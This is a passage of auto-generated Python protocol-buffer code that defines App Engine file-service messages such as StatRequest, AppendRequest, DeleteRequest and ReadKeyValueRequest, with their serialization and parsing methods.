kfinalized = 3
klength = 4
kctime = 5
kmtime = 6
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "content_type",
3: "finalized",
4: "length",
5: "ctime",
6: "mtime",
}, 6)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.NUMERIC,
6: ProtocolBuffer.Encoder.NUMERIC,
}, 6, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FileStat'
class StatRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_file_glob_ = 0
file_glob_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def file_glob(self): return self.file_glob_
def set_file_glob(self, x):
self.has_file_glob_ = 1
self.file_glob_ = x
def clear_file_glob(self):
if self.has_file_glob_:
self.has_file_glob_ = 0
self.file_glob_ = ""
def has_file_glob(self): return self.has_file_glob_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_file_glob()): self.set_file_glob(x.file_glob())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_file_glob_ != x.has_file_glob_: return 0
if self.has_file_glob_ and self.file_glob_ != x.file_glob_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_filename_): n += 1 + self.lengthString(len(self.filename_))
if (self.has_file_glob_): n += 1 + self.lengthString(len(self.file_glob_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_filename_): n += 1 + self.lengthString(len(self.filename_))
if (self.has_file_glob_): n += 1 + self.lengthString(len(self.file_glob_))
return n
def Clear(self):
self.clear_filename()
self.clear_file_glob()
def OutputUnchecked(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_file_glob_):
out.putVarInt32(18)
out.putPrefixedString(self.file_glob_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_file_glob_):
out.putVarInt32(18)
out.putPrefixedString(self.file_glob_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 18:
self.set_file_glob(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_file_glob_: res+=prefix+("file_glob: %s\n" % self.DebugFormatString(self.file_glob_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kfile_glob = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "file_glob",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.StatRequest'
class StatResponse(ProtocolBuffer.ProtocolMessage):
has_more_files_found_ = 0
more_files_found_ = 0
def __init__(self, contents=None):
self.stat_ = []
if contents is not None: self.MergeFromString(contents)
def stat_size(self): return len(self.stat_)
def stat_list(self): return self.stat_
def stat(self, i):
return self.stat_[i]
def mutable_stat(self, i):
return self.stat_[i]
def add_stat(self):
x = FileStat()
self.stat_.append(x)
return x
def clear_stat(self):
self.stat_ = []
def more_files_found(self): return self.more_files_found_
def set_more_files_found(self, x):
self.has_more_files_found_ = 1
self.more_files_found_ = x
def clear_more_files_found(self):
if self.has_more_files_found_:
self.has_more_files_found_ = 0
self.more_files_found_ = 0
def has_more_files_found(self): return self.has_more_files_found_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.stat_size()): self.add_stat().CopyFrom(x.stat(i))
if (x.has_more_files_found()): self.set_more_files_found(x.more_files_found())
def Equals(self, x):
if x is self: return 1
if len(self.stat_) != len(x.stat_): return 0
for e1, e2 in zip(self.stat_, x.stat_):
if e1 != e2: return 0
if self.has_more_files_found_ != x.has_more_files_found_: return 0
if self.has_more_files_found_ and self.more_files_found_ != x.more_files_found_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.stat_:
if not p.IsInitialized(debug_strs): initialized=0
if (not self.has_more_files_found_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: more_files_found not set.')
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.stat_)
for i in xrange(len(self.stat_)): n += self.lengthString(self.stat_[i].ByteSize())
return n + 2
def ByteSizePartial(self):
n = 0
n += 1 * len(self.stat_)
for i in xrange(len(self.stat_)): n += self.lengthString(self.stat_[i].ByteSizePartial())
if (self.has_more_files_found_):
n += 2
return n
def Clear(self):
self.clear_stat()
self.clear_more_files_found()
def OutputUnchecked(self, out):
for i in xrange(len(self.stat_)):
out.putVarInt32(10)
out.putVarInt32(self.stat_[i].ByteSize())
self.stat_[i].OutputUnchecked(out)
out.putVarInt32(16)
out.putBoolean(self.more_files_found_)
def OutputPartial(self, out):
for i in xrange(len(self.stat_)):
out.putVarInt32(10)
out.putVarInt32(self.stat_[i].ByteSizePartial())
self.stat_[i].OutputPartial(out)
if (self.has_more_files_found_):
out.putVarInt32(16)
out.putBoolean(self.more_files_found_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_stat().TryMerge(tmp)
continue
if tt == 16:
self.set_more_files_found(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.stat_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("stat%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_more_files_found_: res+=prefix+("more_files_found: %s\n" % self.DebugFormatBool(self.more_files_found_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstat = 1
kmore_files_found = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "stat",
2: "more_files_found",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.StatResponse'
class AppendRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_data_ = 0
data_ = ""
has_sequence_key_ = 0
sequence_key_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def data(self): return self.data_
def set_data(self, x):
self.has_data_ = 1
self.data_ = x
def clear_data(self):
if self.has_data_:
self.has_data_ = 0
self.data_ = ""
def has_data(self): return self.has_data_
def sequence_key(self): return self.sequence_key_
def set_sequence_key(self, x):
self.has_sequence_key_ = 1
self.sequence_key_ = x
def clear_sequence_key(self):
if self.has_sequence_key_:
self.has_sequence_key_ = 0
self.sequence_key_ = ""
def has_sequence_key(self): return self.has_sequence_key_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_data()): self.set_data(x.data())
if (x.has_sequence_key()): self.set_sequence_key(x.sequence_key())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_data_ != x.has_data_: return 0
if self.has_data_ and self.data_ != x.data_: return 0
if self.has_sequence_key_ != x.has_sequence_key_: return 0
if self.has_sequence_key_ and self.sequence_key_ != x.sequence_key_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_data_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: data not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthString(len(self.data_))
if (self.has_sequence_key_): n += 1 + self.lengthString(len(self.sequence_key_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_data_):
n += 1
n += self.lengthString(len(self.data_))
if (self.has_sequence_key_): n += 1 + self.lengthString(len(self.sequence_key_))
return n
def Clear(self):
self.clear_filename()
self.clear_data()
self.clear_sequence_key()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(18)
out.putPrefixedString(self.data_)
if (self.has_sequence_key_):
out.putVarInt32(26)
out.putPrefixedString(self.sequence_key_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_data_):
out.putVarInt32(18)
out.putPrefixedString(self.data_)
if (self.has_sequence_key_):
out.putVarInt32(26)
out.putPrefixedString(self.sequence_key_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 18:
self.set_data(d.getPrefixedString())
continue
if tt == 26:
self.set_sequence_key(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_data_: res+=prefix+("data: %s\n" % self.DebugFormatString(self.data_))
if self.has_sequence_key_: res+=prefix+("sequence_key: %s\n" % self.DebugFormatString(self.sequence_key_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kdata = 2
ksequence_key = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "data",
3: "sequence_key",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.AppendRequest'
class AppendResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.AppendResponse'
class DeleteRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
return n
def Clear(self):
self.clear_filename()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.DeleteRequest'
class DeleteResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.DeleteResponse'
class ReadRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_pos_ = 0
pos_ = 0
has_max_bytes_ = 0
max_bytes_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def pos(self): return self.pos_
def set_pos(self, x):
self.has_pos_ = 1
self.pos_ = x
def clear_pos(self):
if self.has_pos_:
self.has_pos_ = 0
self.pos_ = 0
def has_pos(self): return self.has_pos_
def max_bytes(self): return self.max_bytes_
def set_max_bytes(self, x):
self.has_max_bytes_ = 1
self.max_bytes_ = x
def clear_max_bytes(self):
if self.has_max_bytes_:
self.has_max_bytes_ = 0
self.max_bytes_ = 0
def has_max_bytes(self): return self.has_max_bytes_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_pos()): self.set_pos(x.pos())
if (x.has_max_bytes()): self.set_max_bytes(x.max_bytes())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_pos_ != x.has_pos_: return 0
if self.has_pos_ and self.pos_ != x.pos_: return 0
if self.has_max_bytes_ != x.has_max_bytes_: return 0
if self.has_max_bytes_ and self.max_bytes_ != x.max_bytes_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_pos_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: pos not set.')
if (not self.has_max_bytes_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: max_bytes not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthVarInt64(self.pos_)
n += self.lengthVarInt64(self.max_bytes_)
return n + 3
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_pos_):
n += 1
n += self.lengthVarInt64(self.pos_)
if (self.has_max_bytes_):
n += 1
n += self.lengthVarInt64(self.max_bytes_)
return n
def Clear(self):
self.clear_filename()
self.clear_pos()
self.clear_max_bytes()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(16)
out.putVarInt64(self.pos_)
out.putVarInt32(24)
out.putVarInt64(self.max_bytes_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_pos_):
out.putVarInt32(16)
out.putVarInt64(self.pos_)
if (self.has_max_bytes_):
out.putVarInt32(24)
out.putVarInt64(self.max_bytes_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 16:
self.set_pos(d.getVarInt64())
continue
if tt == 24:
self.set_max_bytes(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_pos_: res+=prefix+("pos: %s\n" % self.DebugFormatInt64(self.pos_))
if self.has_max_bytes_: res+=prefix+("max_bytes: %s\n" % self.DebugFormatInt64(self.max_bytes_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kpos = 2
kmax_bytes = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "pos",
3: "max_bytes",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
3: ProtocolBuffer.Encoder.NUMERIC,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadRequest'
class ReadResponse(ProtocolBuffer.ProtocolMessage):
has_data_ = 0
data_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def data(self): return self.data_
def set_data(self, x):
self.has_data_ = 1
self.data_ = x
def clear_data(self):
if self.has_data_:
self.has_data_ = 0
self.data_ = ""
def has_data(self): return self.has_data_
def MergeFrom(self, x):
assert x is not self
if (x.has_data()): self.set_data(x.data())
def Equals(self, x):
if x is self: return 1
if self.has_data_ != x.has_data_: return 0
if self.has_data_ and self.data_ != x.data_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_data_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: data not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.data_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_data_):
n += 1
n += self.lengthString(len(self.data_))
return n
def Clear(self):
self.clear_data()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.data_)
def OutputPartial(self, out):
if (self.has_data_):
out.putVarInt32(10)
out.putPrefixedString(self.data_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_data(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_data_: res+=prefix+("data: %s\n" % self.DebugFormatString(self.data_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdata = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "data",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadResponse'
class ReadKeyValueRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_start_key_ = 0
start_key_ = ""
has_max_bytes_ = 0
max_bytes_ = 0
has_value_pos_ = 0
value_pos_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def start_key(self): return self.start_key_
def set_start_key(self, x):
self.has_start_key_ = 1
self.start_key_ = x
def clear_start_key(self):
if self.has_start_key_:
self.has_start_key_ = 0
self.start_key_ = ""
def has_start_key(self): return self.has_start_key_
def max_bytes(self): return self.max_bytes_
def set_max_bytes(self, x):
self.has_max_bytes_ = 1
self.max_bytes_ = x
def clear_max_bytes(self):
if self.has_max_bytes_:
self.has_max_bytes_ = 0
self.max_bytes_ = 0
def has_max_bytes(self): return self.has_max_bytes_
def value_pos(self): return self.value_pos_
def set_value_pos(self, x):
self.has_value_pos_ = 1
self.value_pos_ = x
def clear_value_pos(self):
if self.has_value_pos_:
self.has_value_pos_ = 0
self.value_pos_ = 0
def has_value_pos(self): return self.has_value_pos_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_start_key()): self.set_start_key(x.start_key())
if (x.has_max_bytes()): self.set_max_bytes(x.max_bytes())
if (x.has_value_pos()): self.set_value_pos(x.value_pos())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_start_key_ != x.has_start_key_: return 0
if self.has_start_key_ and self.start_key_ != x.start_key_: return 0
if self.has_max_bytes_ != x.has_max_bytes_: return 0
if self.has_max_bytes_ and self.max_bytes_ != x.max_bytes_: return 0
if self.has_value_pos_ != x.has_value_pos_: return 0
if self.has_value_pos_ and self.value_pos_ != x.value_pos_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_start_key_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: start_key not set.')
if (not self.has_max_bytes_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: max_bytes not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthString(len(self.start_key_))
n += self.lengthVarInt64(self.max_bytes_)
if (self.has_value_pos_): n += 1 + self.lengthVarInt64(self.value_pos_)
return n + 3
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_start_key_):
n += 1
n += self.lengthString(len(self.start_key_))
if (self.has_max_bytes_):
n += 1
n += self.lengthVarInt64(self.max_bytes_)
if (self.has_value_pos_): n += 1 + self.lengthVarInt64(self.value_pos_)
return n
def Clear(self):
self.clear_filename()
self.clear_start_key()
self.clear_max_bytes()
self.clear_value_pos()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(18)
out.putPrefixedString(self.start_key_)
out.putVarInt32(24)
out.putVarInt64(self.max_bytes_)
if (self.has_value_pos_):
out.putVarInt32(32)
out.putVarInt64(self.value_pos_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_start_key_):
out.putVarInt32(18)
out.putPrefixedString(self.start_key_)
if (self.has_max_bytes_):
out.putVarInt32(24)
out.putVarInt64(self.max_bytes_)
if (self.has_value_pos_):
out.putVarInt32(32)
out.putVarInt64(self.value_pos_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 18:
self.set_start_key(d.getPrefixedString())
continue
if tt == 24:
self.set_max_bytes(d.getVarInt64())
continue
if tt == 32:
self.set_value_pos(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_start_key_: res+=prefix+("start_key: %s\n" % self.DebugFormatString(self.start_key_))
if self.has_max_bytes_: res+=prefix+("max_bytes: %s\n" % self.DebugFormatInt64(self.max_bytes_))
if self.has_value_pos_: res+=prefix+("value_pos: %s\n" % self.DebugFormatInt64(self.value_pos_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kstart_key = 2
kmax_bytes = 3
kvalue_pos = 4
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "start_key",
3: "max_bytes",
4: "value_pos",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.NUMERIC,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadKeyValueRequest'
class ReadKeyValueResponse_KeyValue(ProtocolBuffer.ProtocolMessage):
has_key_ = 0
key_ = ""
has_value_ = 0
value_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def key(self): return self.key_
def set_key(self, x):
self.has_key_ = 1
self.key_ = x
def clear_key(self):
if self.has_key_:
self.has_key_ = 0
self.key_ = ""
def has_key(self): return self.has_key_
def value(self): return self.value_
def set_value(self, x):
self.has_value_ = 1
self.value_ = x
def clear_value(self):
if self.has_value_:
self.has_value_ = 0
self.value_ = ""
def has_value(self): return self.has_value_
def MergeFrom(self, x):
assert x is not self
if (x.has_key()): self.set_key(x.key())
if (x.has_value()): self.set_value(x.value())
def Equals(self, x):
if x is self: return 1
if self.has_key_ != x.has_key_: return 0
if self.has_key_ and self.key_ != x.key_: return 0
if self.has_value_ != x.has_value_: return 0
if self.has_value_ and self.value_ != x.value_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_key_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: key not set.')
if (not self.has_value_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: value not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.key_))
n += self.lengthString(len(self.value_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_key_):
n += 1
n += self.lengthString(len(self.key_))
if (self.has_value_):
n += 1
n += self.lengthString(len(self.value_))
return n
def Clear(self):
self.clear_key()
self.clear_value()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def OutputPartial(self, out):
if (self.has_key_):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_key(d.getPrefixedString())
continue
if tt == 18:
self.set_value(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_key_: res+=prefix+("key: %s\n" % self.DebugFormatString(self.key_))
